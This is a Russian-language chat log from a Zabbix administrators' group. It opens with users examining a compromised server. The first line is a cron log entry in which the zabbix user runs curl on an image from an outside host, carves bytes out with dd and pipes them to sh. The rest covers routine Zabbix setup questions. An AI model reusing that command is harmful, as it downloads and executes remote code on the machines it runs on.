CROND[12789]: (zabbix) CMD (curl https://ooo.0o0.ooo/2017/01/21/58837a6d11262.jpg -k|dd skip=3458 bs=1|sh )

Так, почему именно под пользователем zabbix

Может не всё так плохо

{jnz хотя почему 404

Там картинка

Выведи в файл, а не в шелл, посмотри

Интересно теперь :)

Чуть позже, сейчас пойду поем

это та картинка

Request Method: GET Status Code: 404

дохлая

это та картинка

Я расстрою, но 404 - это ошибка, когда файл не найден

Я расстрою, но 404 - это ошибка, когда файл не найден

Что мешает сделать картинку с текстом 404

Неважно что на пикче

Важно что скажет сервер

Можете подсказать что это?)

А так, ради интереса, подскажи права (chmod) на файлы конфигурации агента :)

Вопрос. У меня заббикс Zabbix 3.4.1 в образе на виртуалке. Внутри нее убунта 14.04 с питоном Python 2.7.6 а поддержка sock5 прокси появилась в более поздних версиях. Посоветуйте как лучше провести обновление?

Убунта говорит python is already the newest version.

тыкать в python3

понять что такое pip и зачем оно

А так, ради интереса, подскажи права (chmod) на файлы конфигурации агента :)

Это zabbix server

счас покажу

750 drwxr-x--- 2 apache apache 4096 May 24 06:41 web 644 -rw-r--r— 1 root root 10389 Oct 7 2016 zabbix_agentd.conf 644 -rw-r--r— 1 root root 10379 May 9 11:57 zabbix_agentd.conf.rpmnew 755 drwxr-xr-x 2 root root 4096 May 24 06:42 zabbix_agentd.d 640 -rw-r---— 1 root zabbix 14884 Sep 18 2017 zabbix_server.conf

Все не допру как они просочились

Продолжаю держать вкурсе:

В то время стоят старый zabbix

Началось все Mon Feb 27 15:00:05 2017

не самый плохой вариант

не самый плохой вариант

Да понятно что меньшее зло, я не понимаю через что они добрались до shell

доступ к вэбу в интернет открыт ? ... ps я не особо разбираюсь в технологиях защиты вэб контента , но на всякий случай дропаю всё iptables'ами и даю доступ только доверенным ипам

доступ к вэбу в интернет открыт ? ... ps я не особо разбираюсь в технологиях защиты вэб контента , но на всякий случай дропаю всё iptables'ами и даю доступ только доверенным ипам

Да, открыт, скорее всего web, но, как они вышли на пользователя zabbix

брутфорс какойнибудь , ботнетом наверно не долго

брутфорс какойнибудь , ботнетом наверно не долго

Брутфорс чего? Учетки ssh? zabbix ?

zabbix❌995:993:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin

наверно ограничего , если бы выжирали полностью ресурсы - ты бы сразу нашел , и выключил , а там может миллион серваков майнят , и владельцы не в курсе

Zabbix не могли подбирать, он не входит в систему

/var/log/secure погляди

Брутфорс чего? Учетки ssh? zabbix ?

хз , я не знаю как это работает ) может какойнибудь webмежсайтовыйxsslиещёмногоНеПонятныхАбривиатур использовали

:D

Так, допустим было ОТВЕРСТИЕ в системе безопастности сайта, тогда они должны быть apache:apache

Но запущено от zabbix

SQL injection vulnerability in Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php.

?

/var/log/secure погляди

Слишком давние события, с февраля

Всем привет, кто помнит как перевести заббикс в вид http://ip:port

sshd[16922]: Received disconnect from 181.15.216.20 port 36348:11: Normal Shutdown, Thank you for playing [preauth] лол

на убунте

Всем привет, кто помнит как перевести заббикс в вид http://ip:port

В смысле?

Повесить на другой порт хочешь или что

в смысле не http://ip/zabbix а http://ip:port

не - порт тот же. вебку хочу подправить

в смысле не http://ip/zabbix а http://ip:port

в смысле не http://ip/zabbix, а http://ip/ ?

Может про это?

а при чём тут заббикс? веб-сервер крутить надо

в смысле не http://ip/zabbix а http://ip:port

В том, что вы описали я вижу две задачи. Одна это избавится от папки

чтоб можно было просто по ip заходить и сразу открывался zabbix

Если это всё, что нужно, то в nginx'е можно просто rewrite сделать

Всем привет, кто помнит как перевести заббикс в вид http://ip:port

заставить отвечать веб-сервер на запросы при обращении к http://IP:Port

Если это всё, что нужно, то в nginx'е можно просто rewrite сделать

достаточно правиьно указать root

достаточно правиьно указать root

А, ну у меня просто заббикс за балансировщиком стоит

И там proxy_pass

А если /etc/httpd/conf.d/zabbix.conf отредактировать

ну мы ж не знаем что там и как

ERROR: S client not available

Заменив Alias /zabbix /usr/share/zabbix на Alias / /usr/share/zabbix

описывать надо точно

А вот про апач не подскажу, сорри

а вообще обращение по IP - дурной тон из 90-х

не не - там виртуалка для тестов и более ничего

может ребята на ipv6 перешли, там адреса норм запоминаются

и апач...

а вообще обращение по IP - дурной тон из 90-х

А мы с вами на брудершафт не пили, что бы на домен перейти

А мы с вами на брудершафт не пили, что бы на домен перейти

ок

А мы с вами на брудершафт не пили, что бы на домен перейти

а потом окажется, что в продакшене где-нибудь застрял ip и ничего не пашет :)

:))

ок

Это шутка была, а то ваш "ок" такой серьезный.

дык

в общем я всегда за то чтобы понять почему такая проблема а не как решить конкретное техническое что-то

в общем я всегда за то чтобы понять почему такая проблема а не как решить конкретное техническое что-то

А, ну это то да

зачастую изначально что-то с консерваторией и пытаются техническими средствами выправить

может ребята на ipv6 перешли, там адреса норм запоминаются

Шутки за сто ? ))) * А агентов кто как по компьютерам раскидывает?

У нас ansible, всё нормально.

Шутки за сто ? ))) * А агентов кто как по компьютерам раскидывает?

ansible

ansible

С блекджеком, метадатой и авторегистрацией ?

Заменив Alias /zabbix /usr/share/zabbix на Alias / /usr/share/zabbix

невзлетело - вэбка недоступна

невзлетело - вэбка недоступна

Счас тогда посмотрю как сам сделал

snmp то поставил, а snmp-mibs-downloader не было в пакетах

в Debian он находится в non-free репозитории

Друзья. помогите со скринами. Почему одним пользователям заббикс виден скрин, другим нет. Проблема, думаю в правах. Но в чём конкретно, не соображу. Подскажите, плиз

Друзья. помогите со скринами. Почему одним пользователям заббикс виден скрин, другим нет. Проблема, думаю в правах. Но в чём конкретно, не соображу. Подскажите, плиз

посмотри права пользователя и группы.. там ты увидишь какие могут видеть какие скрины, а кто нет

Какие права нужны, чтобы ползователь мог видеть скрин? read достаточно?

да

и указываешь какой именно скрин

у меня просто заббикса под рукой нет чтоб подробно написать

Извините, забыл сказать версию заббикс. В скринах 3 ветки, прям в настройках скрина есть права и они работаю, как нужно. У меня версия заббикс 2. Там нет в настройках прав

Коллеги, есть ли хороший, годный шаблон для мониторинга дисков? Особенно интересует latency, i/o wait, скорость чтения\записи. Не повредят и данные SMART. Использую Zabbix 3.2